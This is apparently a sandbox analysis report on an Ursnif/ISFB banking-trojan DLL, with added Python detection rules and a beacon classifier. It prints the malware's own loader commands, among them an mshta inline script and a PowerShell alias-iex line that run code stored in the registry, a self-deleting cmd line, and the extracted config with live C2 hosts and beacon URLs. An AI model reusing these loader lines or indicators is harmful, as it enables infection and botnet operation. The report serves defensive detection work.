

Windows Analysis Report
tIJVb0BvkI.dll

Overview

General Information

Sample Name: tIJVb0BvkI.dll
Analysis ID: 620333
MD5: f28f39ada498d66c378fd59227e0f215
SHA1: 1c9c0584ad51f5be3f16b334d758c88b8cdb7b38
SHA256: 0a66e8376fc6d9283e500c6e774dc0a109656fd457a0ce7dbf40419bc8d50936
Tags: dll, geo, Gozi, ISFB, ITA, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6904 cmdline: loaddll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6984 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7020 cmdline: rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4324 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 5832 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 2464 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 3808 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
  • mshta.exe (PID: 6756 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kmli='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kmli).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5612 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5896 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3368 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4168 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
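The tree above is the loader chain a detection engineer wants to catch on process-creation telemetry: rundll32.exe starting control.exe -h, the injected explorer.exe running cmd /C ping localhost -n 5 && del on the dropped DLL, mshta.exe evaluating an inline about:<hta:application> document that reads a value under HKCU\Software\AppDataLow\Software\Microsoft\{GUID}, and powershell.exe aliasing gp/iex to execute the UrlsReturn value and compiling C# through csc.exe. The following is an added example and not part of the Joe Sandbox report: a small Python rule set run over events transcribed from the tree (quoting normalised) plus one constructed benign event. The event layout, rule names and the three-rule threshold are this example's own choices.

```python
import re

# Constructed input: process-creation events transcribed from the report's process tree
# (image, parent image, command line; quoting normalised). The dict layout is this
# example's own and not Joe Sandbox's export format. The last event is a constructed
# benign control so the rules have a negative case.
EVENTS = [
    {"parent": "rundll32.exe", "image": "control.exe",
     "cmd": r"C:\Windows\system32\control.exe -h"},
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmd": r'C:\Windows\System32\cmd.exe /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll"'},
    {"parent": None, "image": "mshta.exe",  # the report shows mshta at the root of the tree
     "cmd": r'''C:\Windows\System32\mshta.exe "about:<hta:application><script>Kmli='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kmli).regread('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\TestLocal'));if(!window.flag)close()</script>"'''},
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'},
    {"parent": "powershell.exe", "image": "csc.exe",
     "cmd": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline"'},
    {"parent": "cmd.exe", "image": "PING.EXE",  # constructed benign control
     "cmd": "ping localhost -n 5"},
]


def _ci(pattern, text):
    """Case-insensitive regex search helper."""
    return re.search(pattern, text, re.IGNORECASE) is not None


def _parent(e):
    return (e.get("parent") or "").lower()


def rule_ping_then_del(e):
    """cmd /C ping <host> -n N && del <file>: ping used as a sleep, then self-deletion."""
    return e["image"].lower() == "cmd.exe" and _ci(r"\bping\b.*\s-n\s+\d+.*&&\s*del\b", e["cmd"])


def rule_mshta_inline_hta(e):
    """mshta fed an inline about:<hta:application> document that evals a registry value."""
    return (e["image"].lower() == "mshta.exe"
            and _ci(r"about:<hta:application>", e["cmd"])
            and _ci(r"regread\(", e["cmd"]))


def rule_powershell_registry_iex(e):
    """PowerShell aliasing iex, reading a value under HKCU AppDataLow and executing it."""
    return (e["image"].lower() == "powershell.exe"
            and _ci(r"new-alias\s+-name\s+\S+\s+-value\s+(iex|invoke-expression)\b", e["cmd"])
            and _ci(r"AppDataLow", e["cmd"]))


def rule_csc_from_powershell(e):
    """csc.exe compiling a TEMP *.cmdline for a powershell.exe parent (Add-Type style build).
    Legitimate scripts do this too; it is a supporting signal, not proof on its own."""
    return (e["image"].lower() == "csc.exe" and _parent(e) == "powershell.exe"
            and _ci(r"/noconfig\b.*\\Temp\\.*\.cmdline", e["cmd"]))


def rule_control_h_from_rundll32(e):
    """control.exe -h started by rundll32.exe, the hop the report shows before explorer injection."""
    return (e["image"].lower() == "control.exe" and _parent(e) == "rundll32.exe"
            and _ci(r"\s-h\s*$", e["cmd"]))


RULES = {
    "ping_then_del": rule_ping_then_del,
    "mshta_inline_hta": rule_mshta_inline_hta,
    "powershell_registry_iex": rule_powershell_registry_iex,
    "csc_from_powershell": rule_csc_from_powershell,
    "control_h_from_rundll32": rule_control_h_from_rundll32,
}


def evaluate(events):
    """Map each event index to the names of the rules that fired on it."""
    return {i: [name for name, fn in RULES.items() if fn(e)] for i, e in enumerate(events)}


def chain_verdict(events, threshold=3):
    """Treat the batch as an Ursnif-like loader chain when several distinct rules fire;
    a single hit (for example csc.exe alone) stays informational."""
    fired = sorted({name for names in evaluate(events).values() for name in names})
    return {"rules_fired": fired, "ursnif_like_chain": len(fired) >= threshold}


if __name__ == "__main__":
    for i, names in evaluate(EVENTS).items():
        print(f"{i}: {EVENTS[i]['image']:<15} {names}")
    print(chain_verdict(EVENTS))
```

Each rule is keyed on the command-line shape rather than on the specific GUID, alias names or file names, which Ursnif randomises per infection; the registry path HKCU\Software\AppDataLow\Software\Microsoft is the stable part of the mshta and powershell stages in this report.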
Malware Configuration

{
  "RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=",
  "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"],
  "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"],
  "serpent_key": "Jv1GYc8A8hCBIeVD",
  "tor32_dll": "file://c:\\test\\test32.dll",
  "tor64_dll": "file://c:\\test\\tor64.dll",
  "server": "50",
  "sleep_time": "1",
  "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60",
  "time_value": "60",
  "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60",
  "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300",
  "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60",
  "not_use(CRC_BCTIMEOUT)": "10",
  "botnet": "3000",
  "SetWaitableTimer_value": "1"
}
Source | Rule | Description | Author
00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
(21 further memory-dump entries not shown on this page)

Source | Rule | Description | Author
3.2.rundll32.exe.1060000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.3.rundll32.exe.4b694a0.10.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.3.rundll32.exe.500a4a0.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.3.rundll32.exe.50894a0.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.3.rundll32.exe.4b694a0.10.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(4 further unpacked-PE entries not shown on this page)
                      No Sigma rule has matched
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
05/04/22-16:27:52.293372 | 2033203 | 49738 | 80 | TCP | A Network Trojan was detected
05/04/22-16:28:12.405919 | 2033203 | 49758 | 80 | TCP | A Network Trojan was detected
05/04/22-16:28:12.829578 | 2033204 | 49758 | 80 | TCP | A Network Trojan was detected


                      AV Detection

Source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: Ursnif (the configuration reproduced in full under the process tree above)
Source: tIJVb0BvkI.dll | ReversingLabs: Detection: 47%
Source: tIJVb0BvkI.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_01065FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: tIJVb0BvkI.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.578381495.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.582897274.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: tIJVb0BvkI.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.578381495.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.582897274.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp

                      Networking

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.189.151.28 80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49738 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49738 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49758 -> 185.189.151.28:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49758 -> 185.189.151.28:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: Joe Sandbox View | ASN Name: AS-SOFTPLUSCH AS-SOFTPLUSCH
Source: global traffic | HTTP traffic detected: GET /drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBrJhjkbJ6O/93dARdUH_2FoHr_2FV/0rrTpy9pc/1HdKJKRhTt7WBB4IQK6y/YM407RHM4U2q_2BMJQz/BPrYtABTFqi6nvzwRvIVUe/ZccTd3lUnONRt/36Ya8mGx/TeFUFTZ_2BUkjcjLP_2BV5Q/RmDIE1kWYj/OUKtn8nbT_2FNqVm2/qgQV8CVfL5vg/g3ZAMbEOx9s/O0o9X0KU42gffO/GcaP_2Fr_/2BV4K.jlk HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 185.189.151.28
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlk HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 185.189.151.28
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlk HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 185.189.151.28
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 (this entry appears 50 times in the report, once per connection)
Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/
Source: rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/A_2Fp
Source: rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umz
Source: rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBr
Source: rundll32.exe, 00000003.00000002.642559499.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642541789.0000000000A80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBrJhjkbJ6O/93d
Source: rundll32.exe, 00000003.00000002.642559499.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQ
Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517515689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642709206.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLE
Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/ws
Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642779966.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/drew/5_2BPw3OSauP4MGGq6siPB/_2BnCqBYV_2Ft/k9TDCaV5/kdb0RbX2RH_2FsWBq58E
Source: rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000000A.00000003.604947338.00000227AB271000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsof
Source: rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_01061CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,
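The three GET requests and the two ET rules that fired on them (2033203 for the _2B token, 2033204 for _2F) describe the same artefact: the Ursnif/ISFB beacon carries its request as a base64-derived blob inside the URI path, chopped into pseudo-random directories by inserted "/" characters, sent with a fixed MSIE 8.0 User-Agent to a bare-IP Host. Two details worth noting from the report itself: the first beacons went to 13.107.42.16 (config.edge.skype.com, the first entry of the c2_domain list, which serves as a decoy), and the real C2 185.189.151.28 was contacted without any preceding DNS query and is not in the extracted c2_domain list, which names 185.189.151.181 and .186 in the same /24. The following is an added example, not part of the Joe Sandbox report: it classifies request lines by those indicators and reverses the URI transformation back to a base64 string. The reversal (strip "/", decode each "_XX" as a percent-escape) follows published ISFB analyses and is an assumption here; the result remains Serpent ciphertext under the config's serpent_key and is not decrypted.

```python
import re
import string

B64_CHARS = set(string.ascii_letters + string.digits + "+/=")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed input: the three GET request lines the report records towards 185.189.151.28,
# plus one ordinary request (constructed) so the classifier has a negative case.
SAMPLE_REQUESTS = [
    {"host": "185.189.151.28", "ua": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)",
     "path": "/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBrJhjkbJ6O/93dARdUH_2FoHr_2FV/0rrTpy9pc/1HdKJKRhTt7WBB4IQK6y/YM407RHM4U2q_2BMJQz/BPrYtABTFqi6nvzwRvIVUe/ZccTd3lUnONRt/36Ya8mGx/TeFUFTZ_2BUkjcjLP_2BV5Q/RmDIE1kWYj/OUKtn8nbT_2FNqVm2/qgQV8CVfL5vg/g3ZAMbEOx9s/O0o9X0KU42gffO/GcaP_2Fr_/2BV4K.jlk"},
    {"host": "185.189.151.28", "ua": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)",
     "path": "/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlk"},
    {"host": "185.189.151.28", "ua": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)",
     "path": "/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlk"},
    {"host": "www.example.com", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
     "path": "/static/js/app.js"},
]


def uri_indicators(path):
    """Structural indicators of an Ursnif/ISFB beacon URI. The two token checks are what
    ET 2033203 (_2B, 'M1') and ET 2033204 (_2F, 'M2') key on; the path-depth check is a
    weaker supporting signal."""
    # The bot splits its blob with random '/' characters, so a token can arrive broken
    # across a separator ('GcaP_2Fr_/2BV4K' in the report's first request). Flatten first.
    flat = path.replace("/", "")
    hits = []
    if "_2B" in flat:
        hits.append("token _2B (ET 2033203, URI Struct M1)")
    if "_2F" in flat:
        hits.append("token _2F (ET 2033204, URI Struct M2)")
    if len([s for s in path.split("/") if s]) >= 8:
        hits.append("deep pseudo-random path")
    return hits


def classify(req):
    """Combine URI indicators with the two request-level tells seen in the report:
    a bare IPv4 Host header and the hard-coded MSIE 8.0 User-Agent. Only the token
    checks decide 'suspicious'; the rest is context for the analyst."""
    hits = uri_indicators(req["path"])
    if IPV4.match(req["host"]):
        hits.append("bare IPv4 Host header")
    if "MSIE 8.0" in req["ua"]:
        hits.append("legacy MSIE 8.0 User-Agent")
    suspicious = any(h.startswith("token _2") for h in hits)
    return {"path": req["path"], "indicators": hits, "suspicious": suspicious}


def reconstruct_blob(path, first_dir="drew", ext=".jlk"):
    """Reverse the URI transformation so the payload is a plain base64 string again.
    Assumption (from published ISFB analyses, not stated in this report): the bot
    base64-encodes the Serpent-encrypted request, percent-encodes it, swaps '%' for '_',
    then inserts '/' at random positions. Reversal: drop the fixed first directory and
    extension, strip every '/', then decode each '_XX' escape. The result is still
    Serpent ciphertext under the config's serpent_key; nothing is decrypted here."""
    body = path
    prefix = "/" + first_dir + "/"
    if body.startswith(prefix):
        body = body[len(prefix):]
    if body.endswith(ext):
        body = body[: -len(ext)]
    body = body.replace("/", "")
    return re.sub(r"_([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), body)


def is_base64_alphabet(s):
    """True when every character is in the standard base64 alphabet (sanity check on the reversal)."""
    return bool(s) and set(s) <= B64_CHARS


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        verdict = classify(req)
        print(verdict["suspicious"], verdict["indicators"])
        if verdict["suspicious"]:
            blob = reconstruct_blob(req["path"])
            print("  base64 alphabet:", is_base64_alphabet(blob), "length", len(blob))
```

The flatten-before-match step matters for signature writers as well: a content match on the literal string "_2B" misses a beacon where the random separator happens to land inside the token, as it does at the end of the first request above.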

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
